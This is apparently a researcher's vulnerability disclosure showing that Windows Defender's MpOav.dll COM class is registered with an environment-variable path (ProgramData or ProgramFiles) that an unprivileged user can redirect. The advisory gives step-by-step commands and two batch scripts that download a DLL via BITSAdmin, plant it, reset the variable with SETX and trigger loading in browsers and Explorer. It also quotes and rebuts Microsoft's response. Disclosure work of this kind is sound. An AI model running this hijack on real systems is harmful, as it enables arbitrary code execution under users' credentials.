anti-malwareinterfaces of Microsoft® Windows NT.
tamper protectionannounced in the MSKB articles 2769299 and 4490103, which is described in more detail by Protect security settings with tamper protection, is a bad joke, while its documentation tells a blatant lie:
With tamper protection, malicious apps are prevented from taking actions like these:
- Disabling virus and threat protection
- Disabling real-time protection
- Turning off behavior monitoring
- Disabling antivirus (such as IOfficeAntivirus (IOAV))
- Disabling cloud-delivered protection
- Removing security intelligence updates
anti-malwareinterfaces implemented in Windows, like almost all so-called
security software, don’t increase the safety and security of the operating system, but decrease it instead, and allow to launch attacks in the first place!
As shown hereafter, it is not even able to protect itself, despite the highlighted claim from its documentation cited above.
%ProgramFiles%\Windows Defender\
and
%ProgramFiles(x86)%\Windows Defender\
to
%ProgramData%\Microsoft\Windows Defender\platform\‹version›\
,
violating the minimum requirements of their own,
almost 30 (in words: thirty) years old
Designed for Windowsspecification.
Note: I wish that somebody working for
Microsoft would be able to understand English language
and teach developers the difference between
program files
and
(program) data
as well as
(application) data
!
Ever since this braindead move, the pathnames registered for the
COM
classes provided by Windows Defender reference the
environment variable ProgramData
:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}]
@="Defender CSP"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\DefenderCSP.dll\""
"ThreadingModel"="Free"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}]
@="Windows Defender WMI Provider"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\ProtectionManagement.dll\""
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
Note: the double quotes around the
DLL
pathnames are superfluous and thus yet another
indication of Microsoft’s sloppy development
process as well as the lack of thorough quality assurance and
supervision!
Of special interest here is the implementation of the
IOfficeAntiVirus
COM interface,
documented in the
MSKB
article
Microsoft Windows Defender helps provide real-time protection
6NDASH, introduced with Windows 2000 and
Internet Explorer 5, it is called
(for example) by the
Attachment Manager
introduced with
Windows XP SP2
and
Internet Explorer 6 SP2.
The
Attachment Manager
is in turn called by WWW
browsers, mail and news clients, instant messengers, etc. after they
store a downloaded file, a
WWW page, an email or an
attachment, and by File Explorer
when such a file is to be opened or executed.
In the first case the Attachment Manager adds the
Mark of the Web
, an
NTFS
Alternate Data Stream named
Zone.Identifier
containing the text
[ZoneTransfer]\r\nZoneId=‹integer›\r\n
to
the saved file; in the second case it evaluates the
Mark of the Web
.
Thanks
to the (user-controlled) environment variable
ProgramData
specified in the registered pathname
"%ProgramData%\Microsoft\Windows Defender\platform\‹version›\MpOav.dll"
an (unprivileged) attacker can provide an arbitrary (rogue or
malicious) DLL which
is then loaded and executed by
WWW browsers, mail and
news clients, instant messengers and
File Explorer whenever the user
stores or opens a downloaded file, a
WWW page or an attachment.
Note: this well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC™.
Log on to an arbitrary (unprivileged) user account and start the
Command Processor
%SystemRoot%\System32\Cmd.exe
alias
%ComSpec%
.
Verify that the tamper protection
is enabled and the
IOAV protection
is not disabled:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features TamperProtection REG_DWORD 0x1 ERROR: The specified registry key or value was not found. ERROR: The specified registry key or value was not found.
Download the
cabinet archive
SENTINEL.CAB
as well as the portable executable
image file
SENTINEL.EXE
of the
Vulnerability and Exploit Detector
and save them in your Downloads
directory
%USERPROFILE\Downloads\
:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB START https://skanthak.hier-im-netz.de/download/SENTINEL.EXENote: the downloaded files get the
Mark of the Web!
Extract the
SENTINEL.DLL
for both processor architectures (32-bit: I386; 64-bit:
AMD64) into your Temp
directory
%TMP%\
:
EXPAND.EXE "%USERPROFILE%\Downloads\SENTINEL.CAB" /F:* "%TMP%"
Microsoft (R) File Expansion Utility Version 10.0.11001.16384 Copyright (C) Microsoft Corporation. All rights reserved. Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue Expanding Files .... Expanding Files Complete ... 7 files total.
Determine the registered pathname of
MPOAV.DLL
:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32" /VE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32 (Default) REG_EXPAND_SZ "%ProgramData%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
Choose an arbitrary directory where you can create subdirectories,
for example your user profile %USERPROFILE%\
, the root
directory of Windows’ system drive
%SystemDrive%\
, the system’s Temp
directory %SystemRoot%\Temp\
, or even a (remote)
network share like %LOGONSERVER%\Users\Public\
, then
create the subdirectories Microsoft\
,
Windows Defender\
, Platform\
and
‹version›\
displayed in the previous
step 5. beyond it:
MKDIR "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0"
Copy the
SENTINEL.DLL
that matches the bitness of your system as
MPOAV.DLL
into the
directory ‹version›
created in the
previous step 6.:
COPY "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"on 32-bit (I386 alias x86) installations, and
COPY "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"on 64-bit (AMD64 alias x64) installations!
Verify that you copied the appropriate
SENTINEL.DLL
and check its proper function:
MSIEXEC.EXE /Z "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
Set the environment variable ProgramData
to the
pathname of the directory used in step 6.:
SET ProgramData=%SystemDrive% SETX.EXE ProgramData %SystemDrive%
Start every
WWW browser available with
the same bitness as your system, then download an arbitrary file and
notice the message box displayed by the (rogue)
%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll
called from the WWW
browser and running unrestricted:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB START IEXPLORE https://skanthak.hier-im-netz.de/download/SENTINEL.DLL "%ProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE …
Start the portable executable
image file
SENTINEL.EXE
downloaded in step 3. (which got the Mark of the Web
)
and again notice the message box displayed by the (rogue)
%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll
now called from File Explorer:
START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Rem Copyright © 2018-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
If Not Defined ProgramData Exit /B
If Not Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B
SetLocal EnableDelayedExpansion EnableExtensions
For /F "Delims== Tokens=2" %%? In ('Assoc "CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32"') Do Set OFFENDER=%%~?
If /I Not "%OFFENDER:~0,50%" == "%%ProgramData%%\Microsoft\Windows Defender\Platform\" Exit /B
If /I Not "%OFFENDER:~-10%" == "\MPOAV.dll" Exit /B
Set OFFENDER=!OFFENDER:%%ProgramData%%=%SystemDrive%!
If Exist "%OFFENDER%" Exit /B
"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B
MkDir "%OFFENDER:~0,-10%"
If Defined ProgramFiles(x86) Copy "%TMP%\AMD64\SENTINEL.DLL" "%OFFENDER%"
If Not Defined ProgramFiles(x86) Copy "%TMP%\I386\SENTINEL.DLL" "%OFFENDER%"
Set ProgramData=%SystemDrive%
"%SystemRoot%\System32\SetX.exe" ProgramData "%SystemDrive%"
Start https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Start IEXPLORE https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Exit /B
After investigation, our engineers have determine this this behavior is by-design and does not constitute as a vulnerability as reported.OUCH¹: please teach these
engineersthe difference between a pathname registered as
%ProgramData%\…\‹filename›.‹extension›
and a pathname registered as
C:\ProgramData\…\‹filename›.‹extension›
!
Hint: the latter does not allow to load and execute an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!
The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.
For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.OUCH²: the attack surface for the current scenario is but provided by Windows Defender due to its poor implementation (see above) which allows this attack in the first place.Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.
There is also no utility process started here: the attacker controlled DLL is loaded and executed in the processes which want to call AV, instead of the DLL installed with Windows Defender, preventing exactly the intended execution of the AV’s utility process and defeating your design!
Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.OUCH³: there is neither an utility process nor a decoupled process involved!
The demonstration runs an arbitrary (rogue or malicious)
DLL in the process
of a WWW browser, a mail
and news client, an instant messenger as well as the shell
alias File Explorer, with the
credentials of the current user, unrestricted.
As such, we are closing this case.That said, I conclude you are neither interested in
trustworthy computingnor the safety and security of your customers – I recommend to have yourselves, your developers, your engineers and of course your obviously incompetent managers take a look at your governments Cybersecurity & Infrastructure Security Agency’s Secure by Design initiative and the underlying principle!
windir
, SystemRoot
,
ProgramFiles
, CommonProgramFiles
,
ProgramFiles(x86)
and
CommonProgramFiles(x86)
.
Windows Defender, as shipped with
Windows Vista® and newer versions of
Windows™ NT,
installs a COM
class which implements the
IOfficeAntiVirus
COM interface:
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"%ProgramFiles%\\Windows Defender\\MpOav.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
This COM
interface is (for example) called by the
Attachment Manager,
which is in turn called by
WWW browsers, mail and
news clients, instant messengers, etc. after they store a
downloaded file, a WWW
page or an attachment, and by
File Explorer when such a file
(which carries the Mark of the Web) is to be opened or executed.
Since (user) environment variables set in a user’s profile obscur (system) environment variables with the same name set for the machine, (unprivileged) users can redirect all those paths containing environment variables and execute arbitrary (rogue or malicious) DLLs and programs instead of the intended DLLs and programs!
Note: the resulting well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC™.
Note: Microsoft Security Essentials Microsoft Security Essentials Microsoft Security Essentials, Microsoft Security Essentials Update available for Windows XP, Windows Vista and Windows 7, does not suffer from this vulnerability!
Log on to an arbitrary (unprivileged) user account and start the
Command Processor
%SystemRoot%\System32\Cmd.exe
alias
%ComSpec%
.
Verify that the tamper protection
is enabled and the
IOAV protection
is not disabled:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection" REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features TamperProtection REG_DWORD 0x1 ERROR: The specified registry key or value was not found. ERROR: The specified registry key or value was not found.
Create a directory Rogue Program Files\
in the root
directory of Windows’ system drive
, copy
the directory %ProgramFiles%\Windows Defender\
with its
contents into the empty new directory, then create junction
reparse points to all other subdirectories of the
%ProgramFiles%\
directory inside the new directory:
MKDIR "%SystemDrive%\Rogue Program Files" XCOPY.EXE "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H FOR /D %? IN ("%ProgramFiles%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files\%~nx?" "%~?"
C:\Program Files\Windows Defender\MpAsDesc.dll C:\Program Files\Windows Defender\MpClient.dll C:\Program Files\Windows Defender\MpCmdRun.exe C:\Program Files\Windows Defender\MpCommu.dll C:\Program Files\Windows Defender\MpEvMsg.dll C:\Program Files\Windows Defender\MpOAV.dll C:\Program Files\Windows Defender\MpRTP.dll C:\Program Files\Windows Defender\MpSvc.dll C:\Program Files\Windows Defender\MSASCui.exe C:\Program Files\Windows Defender\MsMpCom.dll C:\Program Files\Windows Defender\MsMpLics.dll C:\Program Files\Windows Defender\MsMpRes.dll C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui 15 File(s) copied Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\… … Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
On 64-bit installations, additionally create a directory
Rogue Program Files (x86)\
in the root directory of
Windows’ system drive
, copy the directory
%ProgramFiles(x86)%\Windows Defender\
with its
contents into the empty new directory, then create junction
reparse points to all other subdirectories of the
%ProgramFiles(x86)%\
directory inside the new
directory:
MKDIR "%SystemDrive%\Rogue Program Files (x86)" XCOPY.EXE "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H FOR /D %? IN ("%ProgramFiles(x86)%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files (x86)\%~nx?" "%~?"
C:\Program Files (x86)\Windows Defender\MpAsDesc.dll C:\Program Files (x86)\Windows Defender\MpClient.dll C:\Program Files (x86)\Windows Defender\MpOAV.dll C:\Program Files (x86)\Windows Defender\MsMpLics.dll C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui 6 File(s) copied Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\… … Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
Download the
cabinet archive
SENTINEL.CAB
as well as the portable executable
image file
SENTINEL.EXE
of the
Vulnerability and Exploit Detector
and save them in your Downloads
directory
%USERPROFILE%\Downloads\
:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB START https://skanthak.hier-im-netz.de/download/SENTINEL.EXENote: the downloaded files get the
Mark of the Web!
Extract the
SENTINEL.DLL
for both processor architectures (32-bit: I386; 64-bit:
AMD64) into your Temp
directory
%TMP%\
:
EXPAND.EXE "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
Microsoft (R) File Expansion Utility Version 6.1.7600.16385 Copyright (C) Microsoft Corporation. All rights reserved. Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue Expanding Files .... Expanding Files Complete ... 7 files total.
On 32-bit installations, copy the 32-bit
SENTINEL.DLL
over
%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll
:
COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
On 64-bit installations, copy the 64-bit
SENTINEL.DLL
over
%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll
and the 32-bit
SENTINEL.DLL
over
%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll
:
COPY /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll" COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll"
Save the value of the environment variable
ProgramFiles
, then set it to the pathname of the
directory created in step 3.:
SET RealProgramFiles=%ProgramFiles% SET ProgramFiles=%SystemDrive%\Rogue Program Files SETX.EXE ProgramFiles "%SystemDrive%\Rogue Program Files"
On 64-bit installations, additionally save the value of the
environment variable ProgramFiles(x86)
, then set it to
the pathname of the directory created in step 4.:
SET RealProgramFiles(x86)=%ProgramFiles(x86)% SET ProgramFiles(x86)=%SystemDrive%\Rogue Program Files SETX.EXE ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"
Download an arbitrary file with your
WWW browser, for example
SENTINEL.DLL
,
or save an attachment in your mail client:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%RealProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.DLL "%RealProgramFiles(x86)%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.EXEThis loads and executes
%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll
and
%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll
which display message boxes with informations about their caller,
instead of C:\Program Files\Windows Defender\MpOAV.dll
and C:\Program Files (x86)\Windows Defender\MpOAV.dll
!
Start the portable executable
image file
SENTINEL.EXE
downloaded in step 5. (which got the Mark of the Web
)
and again notice the message box displayed by
%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll
or
%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll
now called from File Explorer:
START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Rem Copyright © 2009-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
Rem (KB4052623)
Rem If Defined ProgramData If Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B
"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B
If Not Defined ProgramFiles Exit /B
If Not Exist "%ProgramFiles%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files" Exit /B
MkDir "%SystemDrive%\Rogue Program Files"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files\%%~nx?" "%%?"
Set RealProgramFiles=%ProgramFiles%
Set ProgramFiles=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles "%SystemDrive%\Rogue Program Files"
Start https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
"%RealProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
If Not Defined ProgramFiles(x86) Exit /B
If Not Exist "%ProgramFiles(x86)%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files (x86)" Exit /B
MkDir "%SystemDrive%\Rogue Program Files (x86)"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
Copy /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles(x86)%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files (x86)\%%~nx?" "%%?"
Set RealProgramFiles(x86)=%ProgramFiles(x86)%
Set ProgramFiles(x86)=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"
"%RealProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Exit /B
This was also assessed a similar was as they other reported case.OUCH¹: please teach theseAfter investigation, our engineers have determine this this behavior is by-design and does not constitute as a vulnerability as reported.
engineersthe difference between a pathname registered as
%ProgramFiles%\…\‹filename›.‹extension›
and a pathname registered as
C:\Program Files\…\‹filename›.‹extension›
!
Hint: the latter does not allow to load and execute an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!
The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.
For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.OUCH²: the attack surface for the current scenario is but provided by Windows Defender due to its poor implementation (see above) which allows this attack in the first place.Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.
There is also no utility process started here: the attacker controlled DLL is loaded and executed in the processes which want to call AV, instead of the DLL installed with Windows Defender, preventing exactly the intended execution of the AV’s utility process and defeating your design!
Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.OUCH³: there is neither an utility process nor a decoupled process involved!
The demonstration runs an arbitrary (rogue or malicious)
DLL in the process
of a WWW browser, a mail
and news client, an instant messenger as well as the shell
alias File Explorer, with the
credentials of the current user, unrestricted.
As such, we are closing this case.That said, I conclude you are neither interested in
trustworthy computingnor the safety and security of your customers – I recommend to have yourselves, your developers, your engineers and of course your obviously incompetent managers take a look at your governments Cybersecurity & Infrastructure Security Agency’s Secure by Design initiative and the underlying principle!
generalisedsystem images, designed to run from a single hard disk partition with the drive letter
C
assigned. All
directories and files contained within these system images have
fixed, language-independent (path)names and can
neither be relocated nor renamed: see the
MSKB
articles
949977
and
2787623
for some details. Additionally the vast majority of files are
(nowadays) registered with their absolute (fully qualified) pathname
containing the (fixed) drive letter and the
language-independent directory name, which renders their change or
relocation practically impossible.
The use of environment variables within pathnames serves no (good) purpose, it is not just deprecated and superfluous, but outright dangerous, allowing attacks like those shown above in the first place, and must therefore be avoided and banned!
merged viewof the
HKEY_CLASSES_ROOT
virtual
Registry
tree.
Thanks
to this feature,
COM classes and
interfaces registered by (unprivileged) users below the user’s
HKEY_CURRENT_USER\Software\Classes
Registry key obscure the corresponding
COM classes and
interfaces registered (by administrators) below the machine’s
HKEY_LOCAL_MACHINE\SOFTWARE\Classes
Registry key.
Note: the resulting well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC™.
Log on to an arbitrary (unprivileged) user account.
Download the
SENTINEL.DLL
of the
